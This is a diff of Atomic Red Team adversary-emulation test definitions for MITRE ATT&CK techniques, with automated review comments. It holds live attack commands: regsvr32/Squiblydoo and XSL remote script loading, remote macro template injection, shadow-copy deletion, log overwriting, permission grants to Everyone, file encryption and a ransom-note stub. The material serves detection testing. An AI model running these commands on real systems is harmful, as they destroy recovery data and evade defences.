+++ b/atomics/T1218/src/Infdefaultinstall.inf
@@ -5,4 +5,4 @@ Signature=$CHICAGO$
UnregisterDlls = Squiblydoo
[Squiblydoo]
-11,,scrobj.dll,2,60,https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/src/T1085.sct
+11,,scrobj.dll,2,60,https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct
diff --git a/atomics/T1219/T1219.md b/atomics/T1219/T1219.md
index e569b4f2..58c028d8 100644
--- a/atomics/T1219/T1219.md
+++ b/atomics/T1219/T1219.md
@@ -23,6 +23,10 @@ An adversary may attempt to trick the user into downloading teamviewer and using
**Supported Platforms:** Windows
+**auto_generated_guid:** 8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0
+
+
+
@@ -57,6 +61,10 @@ An adversary may attempt to trick the user into downloading AnyDesk and use to e
**Supported Platforms:** Windows
+**auto_generated_guid:** 6b8b7391-5c0a-4f8c-baee-78d8ce0ce330
+
+
+
@@ -88,6 +96,10 @@ An adversary may attempt to trick the user into downloading LogMeIn and use to e
**Supported Platforms:** Windows
+**auto_generated_guid:** d03683ec-aae0-42f9-9b4c-534780e0f8e1
+
+
+
diff --git a/atomics/T1220/T1220.md b/atomics/T1220/T1220.md
index b38e74bc..c88966ce 100644
--- a/atomics/T1220/T1220.md
+++ b/atomics/T1220/T1220.md
@@ -36,10 +36,14 @@ Executes the code specified within a XSL script tag during XSL transformation us
**Supported Platforms:** Windows
+**auto_generated_guid:** ca23bfb2-023f-49c5-8802-e66997de462d
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| xmlfile | Location of the test XML file on the local filesystem. | Path | PathToAtomicsFolder\T1220\src\msxslxmlfile.xml|
| xslfile | Location of the test XSL script file on the local filesystem. | Path | PathToAtomicsFolder\T1220\src\msxslscript.xsl|
@@ -59,7 +63,7 @@ C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
##### Description: XML file must exist on disk at specified location (#{xmlfile})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{xmlfile}) {exit 0} else {exit 1}
+if (Test-Path #{xmlfile}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -69,7 +73,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
##### Description: XSL file must exist on disk at specified location (#{xslfile})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{xslfile}) {exit 0} else {exit 1}
+if (Test-Path #{xslfile}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -89,10 +93,14 @@ Executes the code specified within a XSL script tag during XSL transformation us
**Supported Platforms:** Windows
+**auto_generated_guid:** a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| xmlfile | Remote location (URL) of the test XML file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml|
| xslfile | Remote location (URL) of the test XSL script file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl|
@@ -119,10 +127,14 @@ Executes the code specified within a XSL script using a local payload.
**Supported Platforms:** Windows
+**auto_generated_guid:** 1b237334-3e21-4a0c-8178-b8c996124988
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| wmic_command | WMI command to execute using wmic.exe | string | process list|
| local_xsl_file | Location of the test XSL script file on the local filesystem. | path | PathToAtomicsFolder\T1220\src\wmicscript.xsl|
@@ -142,7 +154,7 @@ wmic #{wmic_command} /FORMAT:"#{local_xsl_file}"
##### Description: XSL file must exist on disk at specified location (#{local_xsl_file})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1}
+if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -162,10 +174,14 @@ Executes the code specified within a XSL script using a remote payload. Open Cal
**Supported Platforms:** Windows
+**auto_generated_guid:** 7f5be499-33be-4129-a560-66021f379b9b
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_xsl_file | Remote location of an XSL payload. | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl|
| wmic_command | WMI command to execute using wmic.exe | string | process list|
diff --git a/atomics/T1221/T1221.md b/atomics/T1221/T1221.md
index fbad78bd..d39205df 100644
--- a/atomics/T1221/T1221.md
+++ b/atomics/T1221/T1221.md
@@ -16,25 +16,31 @@ This technique may also enable [Forced Authentication](https://attack.mitre.org/
## Atomic Test #1 - WINWORD Remote Template Injection
-Open a .docx file that loads a remote .dotm macro enabled template. Executes the code specified within the .dotm template.Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. Opens Calculator.exe when test sucessfully executed, while AV turned off.
+Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm
+Executes the code specified within the .dotm template.
+Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx.
+Default docs file opens Calculator.exe when test sucessfully executed, while AV turned off.
**Supported Platforms:** Windows
+**auto_generated_guid:** 1489e08a-82c7-44ee-b769-51b72d03521d
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| docx file | Location of the test docx file on the local filesystem. | Path | PathToAtomicsFolder\T1221\src\Calculator.docx|
-| dotm template | Location of the test dotm template on the remote server. | Path | https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm|
+| docx_file | Location of the test docx file on the local filesystem. | Path | PathToAtomicsFolder\T1221\src\Calculator.docx|
#### Attack Commands: Run with `command_prompt`!
```cmd
-start PathToAtomicsFolder\T1221\src\Calculator.docx
+start #{docx_file}
```
@@ -44,7 +50,7 @@ start PathToAtomicsFolder\T1221\src\Calculator.docx
##### Description:
##### Check Prereq Commands:
```powershell
-
+
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1221/T1221.yaml b/atomics/T1221/T1221.yaml
index 631277c1..3c554c5f 100644
--- a/atomics/T1221/T1221.yaml
+++ b/atomics/T1221/T1221.yaml
@@ -4,18 +4,17 @@ atomic_tests:
- name: WINWORD Remote Template Injection
auto_generated_guid: 1489e08a-82c7-44ee-b769-51b72d03521d
description: |
- Open a .docx file that loads a remote .dotm macro enabled template. Executes the code specified within the .dotm template.Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. Opens Calculator.exe when test sucessfully executed, while AV turned off.
+ Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm
+ Executes the code specified within the .dotm template.
+ Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx.
+ Default docs file opens Calculator.exe when test sucessfully executed, while AV turned off.
supported_platforms:
- windows
input_arguments:
- docx file:
+ docx_file:
description: Location of the test docx file on the local filesystem.
type: Path
default: PathToAtomicsFolder\T1221\src\Calculator.docx
- dotm template:
- description: Location of the test dotm template on the remote server.
- type: Path
- default: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm
dependency_executor_name: powershell
dependencies:
- description: |
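Review bot: The rewritten description still carries the misspellings `Ofiice` and `sucessfully` and says `Default docs file` for what is a `.docx` argument; suggest `Requires Microsoft Word (WINWORD), available from https://www.microsoft.com/en-us/download/office.aspx.` and `The default docx file opens Calculator.exe when the test executes successfully (with AV disabled).` The remote template URL moved from the removed `dotm template` argument into the description, where it is informational only; since it points at a GitHub `/tree/master/` page rather than the raw file, it is worth saying that the template actually fetched is whatever Calculator.docx embeds. The `dependencies` entry that begins on the last line continues outside the hunk; the rendered T1221.md elsewhere in this diff shows its description and prereq commands empty, so the WINWORD requirement is never checked before the test runs — either drop the empty dependency or give it a real `prereq_command`.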
@@ -23,5 +22,5 @@ atomic_tests:
get_prereq_command: |
executor:
command: |
- start PathToAtomicsFolder\T1221\src\Calculator.docx
+ start #{docx_file}
name: command_prompt
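Review bot: `start #{docx_file}` breaks when the resolved path contains a space, because cmd's `start` splits its arguments on whitespace, and quoting the path alone does not help since `start` treats a first quoted argument as the window title; use `start "" "#{docx_file}"`. The same applies to the attack command line in the generated T1221.md. The `executor:` block starts outside this hunk.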
diff --git a/atomics/T1222.001/T1222.001.md b/atomics/T1222.001/T1222.001.md
index def6c2c7..bbef7697 100644
--- a/atomics/T1222.001/T1222.001.md
+++ b/atomics/T1222.001/T1222.001.md
@@ -28,10 +28,14 @@ be displayed for the folder and each file inside of it.
**Supported Platforms:** Windows
+**auto_generated_guid:** 98d34bb4-6e75-42ad-9c41-1dae7dc6a001
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_folder_to_own | Path of the file or folder for takeown to take ownership. | path | %temp%\T1222.001_takeown_folder|
@@ -50,7 +54,7 @@ takeown.exe /f #{file_folder_to_own} /r
##### Description: Test requrires a file to take ownership of to be located at (#{file_folder_to_own})
##### Check Prereq Commands:
```cmd
-IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 )
+IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 )
```
##### Get Prereq Commands:
```cmd
@@ -73,10 +77,14 @@ will be displayed.
**Supported Platforms:** Windows
+**auto_generated_guid:** a8206bcc-f282-40a9-a389-05d9c0263485
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_or_folder | Path of the file or folder to change permissions. | path | %temp%\T1222.001_cacls|
| user_or_group | User or group to allow full control | string | Everyone|
@@ -96,7 +104,7 @@ icacls.exe #{file_or_folder} /grant #{user_or_group}:F
##### Description: Test requrires a file to modify to be located at (#{file_or_folder})
##### Check Prereq Commands:
```cmd
-IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
+IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
```
##### Get Prereq Commands:
```cmd
@@ -118,10 +126,14 @@ Open the file in File Explorer > Right Click - Prperties and observe that the Re
**Supported Platforms:** Windows
+**auto_generated_guid:** bec1e95c-83aa-492e-ab77-60c71bbd21b0
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_or_folder | Path of the file or folder remove attribute. | path | %temp%\T1222.001_attrib|
@@ -140,7 +152,7 @@ attrib.exe -r #{file_or_folder}\*.* /s
##### Description: Test requrires a file to modify to be located at (#{file_or_folder})
##### Check Prereq Commands:
```cmd
-IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
+IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
```
##### Get Prereq Commands:
```cmd
@@ -164,10 +176,14 @@ the victim does not see the file.
**Supported Platforms:** Windows
+**auto_generated_guid:** 32b979da-7b68-42c9-9a99-0e39900fc36c
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_or_folder | Path of the file or folder remove attribute. | path | %temp%\T1222.001_attrib_2|
@@ -194,7 +210,7 @@ rmdir #{file_or_folder}
##### Description: Test requires a file to modify to be located at (#{file_or_folder})
##### Check Prereq Commands:
```cmd
-IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
+IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
```
##### Get Prereq Commands:
```cmd
@@ -218,10 +234,14 @@ You can set your own path variable to "C:\*" if you prefer.
**Supported Platforms:** Windows
+**auto_generated_guid:** ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path | Path of folder to recursively set permissions on | path | C:\Users\Public\*|
| file_path | Path of folder permission back | Path | %temp%\T1222.001-folder-perms-backup.txt|
@@ -245,7 +265,7 @@ icacls '#{path}' /restore #{file_path} /q >nul 2>&1
##### Description: Backup of original folder permissions should exist (for use in cleanup commands)
##### Check Prereq Commands:
```cmd
-IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 )
+IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 )
```
##### Get Prereq Commands:
```cmd
diff --git a/atomics/T1222.002/T1222.002.md b/atomics/T1222.002/T1222.002.md
index 607a4344..7d70fc6e 100644
--- a/atomics/T1222.002/T1222.002.md
+++ b/atomics/T1222.002/T1222.002.md
@@ -35,10 +35,14 @@ Changes a file or folder's permissions using chmod and a specified numeric mode.
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 34ca1464-de9d-40c6-8c77-690adf36a135
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| numeric_mode | Specified numeric mode value | string | 755|
| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002|
@@ -65,10 +69,14 @@ Changes a file or folder's permissions using chmod and a specified symbolic mode
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** fc9d6695-d022-4a80-91b1-381f5c35aff3
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| symbolic_mode | Specified symbolic mode value | string | a+w|
| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002|
@@ -95,10 +103,14 @@ Changes a file or folder's permissions recursively using chmod and a specified n
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** ea79f937-4a4d-4348-ace6-9916aec453a4
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| numeric_mode | Specified numeric mode value | string | 755|
| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002|
@@ -125,10 +137,14 @@ Changes a file or folder's permissions recursively using chmod and a specified s
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 0451125c-b5f6-488f-993b-5a32b09f7d8f
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| symbolic_mode | Specified symbolic mode value | string | a+w|
| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002|
@@ -155,10 +171,14 @@ Changes a file or folder's ownership and group information using chown.
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** d169e71b-85f9-44ec-8343-27093ff3dfc0
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| owner | Username of desired owner | string | root|
| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml|
@@ -186,10 +206,14 @@ Changes a file or folder's ownership and group information recursively using cho
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** b78598be-ff39-448f-a463-adbf2a5b7848
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| owner | Username of desired owner | string | root|
| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002|
@@ -217,10 +241,14 @@ Changes a file or folder's ownership only using chown.
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 967ba79d-f184-4e0e-8d09-6362b3162e99
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| owner | Username of desired owner | string | root|
| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml|
@@ -247,10 +275,14 @@ Changes a file or folder's ownership only recursively using chown.
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 3b015515-b3d8-44e9-b8cd-6fa84faf30b2
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| owner | Username of desired owner | string | root|
| file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002|
@@ -278,10 +310,14 @@ This technique was used by the threat actor Rocke during the compromise of Linux
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** e7469fe2-ad41-4382-8965-99b94dd3c13f
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_modify | Path of the file | path | /var/spool/cron/root|
diff --git a/atomics/T1482/T1482.md b/atomics/T1482/T1482.md
index f5d5b0ab..9eac5248 100644
--- a/atomics/T1482/T1482.md
+++ b/atomics/T1482/T1482.md
@@ -24,6 +24,10 @@ Requires the installation of dsquery via Windows RSAT or the Windows Server AD D
**Supported Platforms:** Windows
+**auto_generated_guid:** 4700a710-c821-4e17-a3ec-9e4c81d6845f
+
+
+
@@ -50,6 +54,10 @@ This technique has been used by the Trickbot malware family.
**Supported Platforms:** Windows
+**auto_generated_guid:** 2e22641d-0498-48d2-b9ff-c71e496ccdbe
+
+
+
@@ -67,7 +75,7 @@ nltest /domain_trusts
##### Description: nltest.exe from RSAT must be present on disk
##### Check Prereq Commands:
```cmd
-WHERE nltest.exe >NUL 2>&1
+WHERE nltest.exe >NUL 2>&1
```
##### Get Prereq Commands:
```cmd
@@ -87,6 +95,10 @@ Requires the installation of PowerShell AD admin cmdlets via Windows RSAT or the
**Supported Platforms:** Windows
+**auto_generated_guid:** c58fbc62-8a62-489e-8f2d-3565d7d96f30
+
+
+
@@ -108,7 +120,7 @@ Get-ADGroupMember Administrators -Recursive
##### Description: PowerView PowerShell script must exist on disk
##### Check Prereq Commands:
```powershell
-if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1}
+if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -117,7 +129,7 @@ Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit
##### Description: RSAT PowerShell AD admin cmdlets must be installed
##### Check Prereq Commands:
```powershell
-if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 }
+if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -137,10 +149,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
**Supported Platforms:** Windows
+**auto_generated_guid:** d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe|
@@ -159,7 +175,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -179,10 +195,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
**Supported Platforms:** Windows
+**auto_generated_guid:** 15fe436d-e771-4ff3-b655-2dca9ba52834
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe|
@@ -201,7 +221,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md
index 82bfd6ff..cdb01b5b 100644
--- a/atomics/T1485/T1485.md
+++ b/atomics/T1485/T1485.md
@@ -24,10 +24,14 @@ the powershell session along with other information about the file that was dele
**Supported Platforms:** Windows
+**auto_generated_guid:** 476419b5-aebf-4366-a131-ae3e8dae5fc2
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sdelete_exe | Path of sdelete executable | Path | $env:TEMP\Sdelete\sdelete.exe|
| file_to_delete | Path of file to delete | path | $env:TEMP\T1485.txt|
@@ -48,7 +52,7 @@ Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"
##### Description: Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}
+if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -70,10 +74,14 @@ To stop the test, break the command with CTRL/CMD+C.
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 38deee99-fd65-4031-bec8-bfa4f9f26146
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| overwrite_source | Path of data source to overwrite with | Path | /dev/zero|
| file_to_overwrite | Path of file to overwrite and remove | Path | /var/log/syslog|
diff --git a/atomics/T1486/T1486.md b/atomics/T1486/T1486.md
index b38a9f1f..afe77350 100644
--- a/atomics/T1486/T1486.md
+++ b/atomics/T1486/T1486.md
@@ -16,6 +16,8 @@ In cloud environments, storage objects within compromised accounts may also be e
- [Atomic Test #4 - Encrypt files using openssl (Linux)](#atomic-test-4---encrypt-files-using-openssl-linux)
+- [Atomic Test #5 - PureLocker Ransom Note](#atomic-test-5---purelocker-ransom-note)
+
@@ -25,10 +27,14 @@ Uses gpg to encrypt a file
**Supported Platforms:** Linux
+**auto_generated_guid:** 7b8ce084-3922-4618-8d22-95f996173765
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| pwd_for_encrypted_file | the password that you want for the encrypted file | String | passwd|
| encrypted_file_path | path to the encrypted file | Path | /tmp/passwd.gpg|
@@ -54,7 +60,7 @@ rm #{encrypted_file_path}
##### Description: Finds where gpg is located
##### Check Prereq Commands:
```bash
-which_gpg=`which gpg`
+which_gpg=`which gpg`
```
##### Get Prereq Commands:
```bash
@@ -73,10 +79,14 @@ Uses 7z to encrypt a file
**Supported Platforms:** Linux
+**auto_generated_guid:** 53e6735a-4727-44cc-b35b-237682a151ad
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| pwd_for_encrypted_file | the password that you want for the encrypted file | String | passwd|
| encrypted_file_path | path to the encrypted file | Path | /tmp/passwd.zip|
@@ -102,7 +112,7 @@ rm #{encrypted_file_path}
##### Description: Finds where 7z is located
##### Check Prereq Commands:
```bash
-which_7z=`which 7z`
+which_7z=`which 7z`
```
##### Get Prereq Commands:
```bash
@@ -121,10 +131,14 @@ Attempts to encrypt data on target systems as root to simulate an inturruption a
**Supported Platforms:** Linux
+**auto_generated_guid:** 08cbf59f-85da-4369-a5f4-049cffd7709f
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| cped_file_path | path where you want your copied file to be | Path | /tmp/passwd|
| root_input_file_path | path to the file that you want to be encrypted if you are root user | Path | /etc/passwd|
@@ -152,7 +166,7 @@ if [[ $USER == "root" ]]; then mv #{cped_file_path} #{root_input_file_path}; els
```bash
which_ccencrypt=`which ccencrypt`
which_ccdecrypt=`which ccdecrypt`
-if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi
+if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi
```
##### Get Prereq Commands:
```bash
@@ -171,10 +185,14 @@ Uses openssl to encrypt a file
**Supported Platforms:** Linux
+**auto_generated_guid:** 142752dc-ca71-443b-9359-cf6f497315f1
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| private_key_path | path to the private key | Path | /tmp/key.pem|
| public_key_path | path to the public key | Path | /tmp/pub.pem|
@@ -204,7 +222,7 @@ rm #{encrypted_file_path}
##### Description: Finds where openssl is located
##### Check Prereq Commands:
```bash
-which_openssl=`which openssl`
+which_openssl=`which openssl`
```
##### Get Prereq Commands:
```bash
@@ -214,4 +232,37 @@ which_openssl=`which openssl`
+
+
+
+## Atomic Test #5 - PureLocker Ransom Note
+building the IOC (YOUR_FILES.txt) for the PureLocker ransomware
+https://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 649349c7-9abf-493b-a7a2-b1aa4d141528
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt
+```
+
+#### Cleanup Commands:
+```cmd
+del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1
+```
+
+
+
+
+
diff --git a/atomics/T1486/T1486.yaml b/atomics/T1486/T1486.yaml
index 44f8222c..3e2b9d04 100644
--- a/atomics/T1486/T1486.yaml
+++ b/atomics/T1486/T1486.yaml
@@ -162,3 +162,20 @@ atomic_tests:
cleanup_command: |
$which_openssl rsautl -decrypt -inkey #{private_key_path} -in #{encrypted_file_path}
rm #{encrypted_file_path}
+
+- name: PureLocker Ransom Note
+ auto_generated_guid: 649349c7-9abf-493b-a7a2-b1aa4d141528
+ description: |
+ building the IOC (YOUR_FILES.txt) for the PureLocker ransomware
+ https://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/
+
+ supported_platforms:
+ - windows
+
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: |
+ echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt
+ cleanup_command: |
+ del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1
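Review bot: `elevation_required: true` on the new PureLocker Ransom Note test is not justified by its command: it only writes and deletes a file under the current user's `%USERPROFILE%\Desktop`, which needs no administrative rights, so the test runs with more privilege than it uses and the rendered markdown tells users to run it as admin for nothing. Unless elevation is intended for a reason not visible here, I'd set `elevation_required: false` (or drop the key). The `description` block also ends with a stray empty line, which appears to be carried into the generated T1486.md hunk above as extra blank lines.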
diff --git a/atomics/T1489/T1489.md b/atomics/T1489/T1489.md
index c3d686e0..a220070f 100644
--- a/atomics/T1489/T1489.md
+++ b/atomics/T1489/T1489.md
@@ -23,10 +23,14 @@ started by running the cleanup command.
**Supported Platforms:** Windows
+**auto_generated_guid:** 21dfb440-830d-4c86-a3e5-2a491d5a8d04
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| service_name | Name of a service to stop | String | spooler|
@@ -58,10 +62,14 @@ started by running the cleanup command.
**Supported Platforms:** Windows
+**auto_generated_guid:** 41274289-ec9c-4213-bea4-e43c4aa57954
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| service_name | Name of a service to stop | String | spooler|
@@ -94,10 +102,14 @@ started by running the cleanup command.
**Supported Platforms:** Windows
+**auto_generated_guid:** f3191b84-c38b-400b-867e-3a217a27795f
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process_name | Name of a process to kill | String | spoolsv.exe|
diff --git a/atomics/T1490/T1490.md b/atomics/T1490/T1490.md
index 99ce741a..ad1339ef 100644
--- a/atomics/T1490/T1490.md
+++ b/atomics/T1490/T1490.md
@@ -39,6 +39,10 @@ https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server
**Supported Platforms:** Windows
+**auto_generated_guid:** 43819286-91a9-4369-90ed-d31fb4da2c01
+
+
+
@@ -56,7 +60,7 @@ vssadmin.exe delete shadows /all /quiet
##### Description: Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8.
##### Check Prereq Commands:
```powershell
-if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 }
+if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
@@ -76,6 +80,10 @@ Shadow copies can only be created on Windows server or Windows 8.
**Supported Platforms:** Windows
+**auto_generated_guid:** 6a3ff8dd-f49c-4272-a658-11c2fe58bd88
+
+
+
